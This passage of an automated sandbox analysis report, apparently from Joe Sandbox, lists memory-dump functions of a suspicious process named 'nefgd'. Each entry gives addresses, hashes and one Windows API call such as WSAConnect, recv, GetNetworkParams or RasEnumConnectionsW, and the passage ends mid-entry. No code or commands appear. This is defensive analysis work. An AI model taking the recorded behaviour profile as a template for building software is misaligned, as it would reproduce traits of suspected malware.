Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: ec228289df5bd582a78e01841b591d7f07141ba94f0cfb98547fb7fa09f6a301
Instruction ID: 792b43fe352e26c2a4baf6096152af6d81aed54a84e8eefb208ea64e5526a517
Opcode Fuzzy Hash: ec228289df5bd582a78e01841b591d7f07141ba94f0cfb98547fb7fa09f6a301
Instruction Fuzzy Hash: 3711E6714093846FD722CF11DC44FA6FFB8EF46720F0884DAE9448B692C364A948CBB5

Function 056D153A Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D159E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 1ed08d34920348cd6fbab6ed76f98da50384afba03c086a4060321dc3b9440aa
Instruction ID: 704b7577790d617426fcc894862ceefdeb16d91fc2eac48b469e42891c43e199
Opcode Fuzzy Hash: 1ed08d34920348cd6fbab6ed76f98da50384afba03c086a4060321dc3b9440aa
Instruction Fuzzy Hash: E71190B2904244AFE721CB51CC84FAAFBACEF45324F04886AE9458BA41D774E549CBB5

Function 056D26F2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D274E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 2e9b451c45b6e4ae83aeedb987c8cb0ecf149befc84292b0a036549c0294b54d
Instruction ID: 3e76c66d6d61375e59eb2836b87b76d3f422e67367b7fe794c8d495cfa8dbe38
Opcode Fuzzy Hash: 2e9b451c45b6e4ae83aeedb987c8cb0ecf149befc84292b0a036549c0294b54d
Instruction Fuzzy Hash: C911E275904204AFEB21CF65DC84BAAFBE8EF44324F04886AE9458BA41D374A409CBB1

Function 056D2CF2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 056D2D66

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9491e35e149efae41307276e14213049812a4c552a6b88606563692d9f9884d8
Instruction ID: 962513541bad70e1b2363f69256c17c556233c34d83c1104d0d3b485339c569a
Opcode Fuzzy Hash: 9491e35e149efae41307276e14213049812a4c552a6b88606563692d9f9884d8
Instruction Fuzzy Hash: 6D218E31449780AFDB228F61DC54B52FFF4EF06320F0888DEED858B562D275A458CB62

Function 056D0102 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D0161

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9095e5dae2386e8547d9d257dd7ae040df943755689f6d7c1f09d70c35a4fd17
Instruction ID: bf866c3576c0611901de95d1282139f608b296046d4c28004a6f7961d6a3998f
Opcode Fuzzy Hash: 9095e5dae2386e8547d9d257dd7ae040df943755689f6d7c1f09d70c35a4fd17
Instruction Fuzzy Hash: A711C471904244AFEB21CF91DC44FAAFBE8EF44724F04885AE9458BA51D374A44DCBB5

Function 056D127E Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D12D7

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 455023625bd88fc68e40c582e3240bdf592b018214bee1467edcc3a6e142b24c
Instruction ID: 15fc6e7dc279a31b4238291b7d527024724fdd37148641fcccd7ef802f78defb
Opcode Fuzzy Hash: 455023625bd88fc68e40c582e3240bdf592b018214bee1467edcc3a6e142b24c
Instruction Fuzzy Hash: 0D110671904244AFE721CF51CC44FAAFBE8EF45324F04886AED459BB41C3B4A449CBB5

Function 00A6A2AE Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00A6A30C

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8cab05fec204eaee48940fbc0ae0a6af03b40f1f70a9d36dfad07636d5b32b0e
Instruction ID: 975209acf2c76e49dfabf0875031d0feb846092872aa7d7f868332be949ed221
Opcode Fuzzy Hash: 8cab05fec204eaee48940fbc0ae0a6af03b40f1f70a9d36dfad07636d5b32b0e
Instruction Fuzzy Hash: 7C11917540A3C06FDB228B25DC54B62BFB4DF57624F0880CBED848F663D265A918CB72

Function 00A6B452 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E24), ref: 00A6B4BB

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 38abab16f09cb040f0ce51bf0e6442ccda0c03e1fff158f11e22aaea84ad0413
Instruction ID: 69eeecc885051dad06911bbde8f5de80bc7f8ebc7de7a5e3155c226b601421ef
Opcode Fuzzy Hash: 38abab16f09cb040f0ce51bf0e6442ccda0c03e1fff158f11e22aaea84ad0413
Instruction Fuzzy Hash: 68112571100240AFE720CF11DC85BBAFBA8DF04724F14809AEE048B781C7B4A88DCBB5

Function 056D225A Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D22B9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 2227304797c39190b8883bb3eea428f367e88212497f585b8b9ee40826952f6c
Instruction ID: be1e740cf73b35043b668fa8ff3ed46fbaae147b72a7f8bff61baf7d0dad2bc8
Opcode Fuzzy Hash: 2227304797c39190b8883bb3eea428f367e88212497f585b8b9ee40826952f6c
Instruction Fuzzy Hash: 8111E075400204AFEB218F51CC80FAAFBA8EF04724F04845AFE458BB51C374A449CBB6

Function 00A6A078 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00A6A0D5

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 923119692acfc9564a14e36b3da52eaf2996a8a3098b0f9439d07b5ddbfcab8c
Instruction ID: 9d00415307dbe528d4e0d62f8b84e7d0a8fd3776f82124cffc5c19d755355c98
Opcode Fuzzy Hash: 923119692acfc9564a14e36b3da52eaf2996a8a3098b0f9439d07b5ddbfcab8c
Instruction Fuzzy Hash: 7511CE71549380AFCB22CF11DC44B52FFB4EF56324F0888DEED848B662C275A818CB62

Function 056D161E Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D1677

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: a97cdd3f250e9b49d2896af2524c7aaa15e62c65cac993693d1b5315ab4c5d8b
Instruction ID: 320c8524f68077cdcc23b52b3ad31e1f0638be026257377787d4b671d602729b
Opcode Fuzzy Hash: a97cdd3f250e9b49d2896af2524c7aaa15e62c65cac993693d1b5315ab4c5d8b
Instruction Fuzzy Hash: 8F110475800244AFE721CF01CC84FBAFBA8EF45724F08845AEE448BB41D3B5A84DCAB5

Function 056D1DE2 Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D1E38

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 1d39d0f097fc570ab5de7019e9aaafbacca455bd2a336738521f020a36de9045
Instruction ID: e512f37a754e6ba279aae661bc308c0cb303d580ff30e76d17fb8d0a1cdee73c
Opcode Fuzzy Hash: 1d39d0f097fc570ab5de7019e9aaafbacca455bd2a336738521f020a36de9045
Instruction Fuzzy Hash: 7401E171900244AEEB21CF01DC84BAAFBA8EF45624F04849AEA448BB41D3B4A449CAB5

Function 00A6BEBA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 00A6BF0D

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: da9cd13ae991fd8ffa2021584a2b53d2b4df3e9e3f86de78bbf91a6fec04e3fa
Instruction ID: fb907e6fc57bc813f79aaa6f9247b656a732eaa70285b77a8f3e8eba4c27755d
Opcode Fuzzy Hash: da9cd13ae991fd8ffa2021584a2b53d2b4df3e9e3f86de78bbf91a6fec04e3fa
Instruction Fuzzy Hash: 3E01D271504244AEE720CB01DC84BAAFBE8DF44724F14C096EE058BB91D374E98D8AB5

Function 056D232E Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 056D237A

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 94ebb383f341830c117a2405c0977451f590573bb7338624e058490ca6bf521a
Instruction ID: dc56bb9bbbdc4c25f85b88d26e94ccedeef50569ecf70e63b675aab0c7d39b2c
Opcode Fuzzy Hash: 94ebb383f341830c117a2405c0977451f590573bb7338624e058490ca6bf521a
Instruction Fuzzy Hash: A01148359006449FDB20CF55D984B66FBE5FF08220F0889AAEE858BA22D375E459CB71

Function 056D28FA Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 056D294A

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 5f294585d71c5141205dfd1eb71c04c5c0ea02056e257eb94afda359aa080992
Instruction ID: 1da8da685ef70ec064cc784321f62772b72c3a6315d0914cc60e8dcde1938605
Opcode Fuzzy Hash: 5f294585d71c5141205dfd1eb71c04c5c0ea02056e257eb94afda359aa080992
Instruction Fuzzy Hash: 9F017171600200ABD310DF16DC45B6AFBE8EB88B24F14855AED089BB41D775F915CBE5

Function 056D2D22 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 056D2D66

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d046423dd4456d5b3f0ffe2e37e96718a20634847450e92060a248a87e267ec9
Instruction ID: f0bf35de99c92ae7d3911696fdf4d4a6ea1e1fe41982c6b9785b020707697ae2
Opcode Fuzzy Hash: d046423dd4456d5b3f0ffe2e37e96718a20634847450e92060a248a87e267ec9
Instruction Fuzzy Hash: 50018E358006449FDB21CF51D944B66FFE1EF08720F08889AEE454BA11C375E029CB61

Function 00A6A772 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 00A6A7C2

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 0eae0aadad0fb543a7f17be46e4febd30709b0b015d874a672da0f50da762dd1
Instruction ID: a1afa1d5de93da2f9cfd6b98e0439a0c7079cc26cf6946ee23510e2d1d456f8a
Opcode Fuzzy Hash: 0eae0aadad0fb543a7f17be46e4febd30709b0b015d874a672da0f50da762dd1
Instruction Fuzzy Hash: 3701A271500200ABD250DF16CC46B66FBE8FB88B20F14811AEC089BB41D771F925CBE5

Function 056D037E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 056D03C9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 3a8ff0f3a9c71435aeedb84be2b41391a2e6b4278a0961936a233bd8ada392b7
Instruction ID: b9261f826ed296fbc7c79b8d394bae0c7c48650a5897eb4e9584ef780e73254a
Opcode Fuzzy Hash: 3a8ff0f3a9c71435aeedb84be2b41391a2e6b4278a0961936a233bd8ada392b7
Instruction Fuzzy Hash: 0501A271500200ABD210DF16CC46B66FBE8FB88B20F14811AED089BB41D771F925CBE5

Function 056D02AA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 056D02FA

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9dc5daca95c495b3e31ab82d49be2acf81ccaee594062284a8ca365260366ab3
Instruction ID: bced6fb6262dfe5d30f723557c0a5fa52e0cc257657b1922f3c3c9f2074e90ba
Opcode Fuzzy Hash: 9dc5daca95c495b3e31ab82d49be2acf81ccaee594062284a8ca365260366ab3
Instruction Fuzzy Hash: FF01A271500200ABD210DF16CC46B66FBE8FB88B20F14811AEC089BB41D771F925CBE5

Function 00A6A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00A6A30C

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 893087cc7ddbf2173c56e06efeb103d0f5ad384abc7fe83536b94329d6a20d0b
Instruction ID: b12d4e0530a3b0e372a8127b320a043fb83fd35365f5bb70216b25f7f66bb4e1
Opcode Fuzzy Hash: 893087cc7ddbf2173c56e06efeb103d0f5ad384abc7fe83536b94329d6a20d0b
Instruction Fuzzy Hash: B3F08739904284DFDB208F06D984766FBA4EF14720F08C09ADE495F752D3B9A858CEA2

Function 01090014 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bd71578826394b15787a1e2527e432907f658ff8d26f2800f8040404e38545
Instruction ID: a8ccb86b6e293578e24d0df5037314e3c233617ac31c8c6a0b7cc5acfaa84109
Opcode Fuzzy Hash: c2bd71578826394b15787a1e2527e432907f658ff8d26f2800f8040404e38545
Instruction Fuzzy Hash: 90D1D630204381CFC705EFB4DE587997BA2AB9930CF00C569D4898FBAADB35594ECB52

Function 010907CE Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f8fc2b4db8da8f5aa4c1fd4b912ae718b4599522a5ccf9b3c2bf256da91a66b
Instruction ID: a8327824c6e46d9f80b252fc9d3fd0db944779daf3440156f2177c42ec25c06d
Opcode Fuzzy Hash: 3f8fc2b4db8da8f5aa4c1fd4b912ae718b4599522a5ccf9b3c2bf256da91a66b
Instruction Fuzzy Hash: B1513231B002158FCB04EB78C8647BF7BF6AFC4258B158569E499DB395EB388C4687E1

Function 01090560 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723c4d9935239a66be7a0fa57a59628aca7973c4cfd75be789445d3842cac0f8
Instruction ID: 774676c876b2183e1c5969266108cc2d52c3c19097c83f426f2952c291dd1e93
Opcode Fuzzy Hash: 723c4d9935239a66be7a0fa57a59628aca7973c4cfd75be789445d3842cac0f8
Instruction Fuzzy Hash: B8317430F003059BEF14DB768929BBE7AE69F89244F108428E506EB794EF359805DBA1

Function 010906D1 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63c9bcc143c2a68129c06f8b51fedaae4a9a7d76418bf1d251daee4af2a582d9
Instruction ID: e25200acff55f8b8d5d6ef2b4416c1106b0ca7f0adf392dc4b0426c58549c75c
Opcode Fuzzy Hash: 63c9bcc143c2a68129c06f8b51fedaae4a9a7d76418bf1d251daee4af2a582d9
Instruction Fuzzy Hash: E5218271A10215CFDB54EB78C268AEDBBF5AF48214F110468D442E7355EF354C4ACF91

Function 010A12DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461890394.00000000010A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10a0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f32e1505649df418f124dd685c7385008b7e56c27f00e3f5369dab9a1515297
Instruction ID: c5bacd0ef4059f4e359b44886861f6790ac63cc21125287db17036f882db963c
Opcode Fuzzy Hash: 8f32e1505649df418f124dd685c7385008b7e56c27f00e3f5369dab9a1515297
Instruction Fuzzy Hash: 6D11B431204284DFD715CF94C540B26FBE5AB89708F28C99CE9894BB52C777D817CA51

Function 0556351D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2462357632.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5a6bab55bafeff253edf1ea95c3b10b8313608568bab3be5ef38a0bb2f35609
Instruction ID: 1f69dcf916b91cddbc80f5cac2151b79fe3e12fa4adf697c818fba13bc687d44
Opcode Fuzzy Hash: e5a6bab55bafeff253edf1ea95c3b10b8313608568bab3be5ef38a0bb2f35609
Instruction Fuzzy Hash: C411D7B5908301AFD340CF19D980A5BFBE4FB88660F04892EF998D7311D335E9088FA2

Function 05562AB5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2462357632.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985691f18e814afe18ef397306e75b25bf7cd768ee77650208769d89d448fab0
Instruction ID: 2e9c6226487acfd0238ff3e8eccff19af4e1e7ad39ea407c1c314af82d79ae12
Opcode Fuzzy Hash: 985691f18e814afe18ef397306e75b25bf7cd768ee77650208769d89d448fab0
Instruction Fuzzy Hash: 2A11D7B5908301AFD340CF19D980A5BFBE4FB88664F04891EF998D7311D235EA088FA2

Function 01090938 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d130f4d2fd7526143ab3b7467d48a266629f2b48b11672d1db5526a1ee984c65
Instruction ID: 6fdcd90fc37cdd1ba3b7f73726e4d65c0408925cb57f19c034f354c4b48cf258
Opcode Fuzzy Hash: d130f4d2fd7526143ab3b7467d48a266629f2b48b11672d1db5526a1ee984c65
Instruction Fuzzy Hash: F3019231B001148F8B44EB7D95156AF7AE6ABC9254B114039D409EB354EF348D0587D2

Function 010A12BB Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461890394.00000000010A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10a0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e0feeca4e5cf3ba69eb2b03cca36623b6bedd0220a654f089f45bf767b1bc1
Instruction ID: b6212f2872f155aee4a7d03226eed894d7e5e1bd0dacd5038335388339316fd3
Opcode Fuzzy Hash: d4e0feeca4e5cf3ba69eb2b03cca36623b6bedd0220a654f089f45bf767b1bc1
Instruction Fuzzy Hash: 01118E351093C0DFC3138B54C950B15BFB2AF4A614F28C6DAD4C84BA63C3369816DB51

Function 010904B8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5788b0aa85b9de98aa63a2fdca9b969f394501495f7cb8f27500e47ec31cca23
Instruction ID: 8529d3e42921bbb1c4fcbabc84cb3d753bebb3d46d6af30160f5a12b49596fc7
Opcode Fuzzy Hash: 5788b0aa85b9de98aa63a2fdca9b969f394501495f7cb8f27500e47ec31cca23
Instruction Fuzzy Hash: B6018035B002049BCF00EBB4DD186DEBBF6AB88254F108829E94AE7354EF319D49DB90

Function 010A05E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461890394.00000000010A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10a0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc7356b2641e38b753af401cc3fa720f3d6a35ee085e0529b9a42c0dc3d1464
Instruction ID: 177814a430f7856af797b3913e2fca1e9307a7dead4d138c67fb25823a699b4d
Opcode Fuzzy Hash: 3cc7356b2641e38b753af401cc3fa720f3d6a35ee085e0529b9a42c0dc3d1464
Instruction Fuzzy Hash: 21F086B65093806FD7128B069C40862FFE8EB8663070984AFE849CB712D125A909C771

Function 010A1398 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461890394.00000000010A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10a0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353069910d9b7990af69e6a81ae0fdd4a1cb8011ced05a6191c04bf1adf0271e
Instruction ID: f76be7553e6472267eb376a403e3ef204a27745cd5c9805fc3e696afb6ebb7ae
Opcode Fuzzy Hash: 353069910d9b7990af69e6a81ae0fdd4a1cb8011ced05a6191c04bf1adf0271e
Instruction Fuzzy Hash: AEF0BB35144644DFC716CF44D540B16FBE2EB89718F24CAA9E98917A52C737E823DA81

Function 010A0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461890394.00000000010A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10a0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39af8abdc8382f9bdb817610e895f5e8acee1160d3097be1db9efa9dfc0b0923
Instruction ID: 6c66d37b8efacdaec3f236c34bbeaec37bb82937c87b01f5f3f015fa6f94bbba
Opcode Fuzzy Hash: 39af8abdc8382f9bdb817610e895f5e8acee1160d3097be1db9efa9dfc0b0923
Instruction Fuzzy Hash: C5E092B66006044B9650CF0AED41456F7D8EB84630708C47FDC0D8BB01D279B508CBA5

Function 0556357F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2462357632.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc0939d75d91f01cba2f40b84a1a1cc0961828b6547992dde3ea5e48f39a921
Instruction ID: e7bdf12c7df368775a7a070d63274f8e1a449223fcbb3455aa2d43124742fc90
Opcode Fuzzy Hash: fbc0939d75d91f01cba2f40b84a1a1cc0961828b6547992dde3ea5e48f39a921
Instruction Fuzzy Hash: 60E0D8B254020067D2508E069C45F62FB98DB94A31F08C567ED085B741D175B5188AF1

Function 05562B17 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2462357632.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_nefgd.jbxd

Similarity

API ID:
String ID:
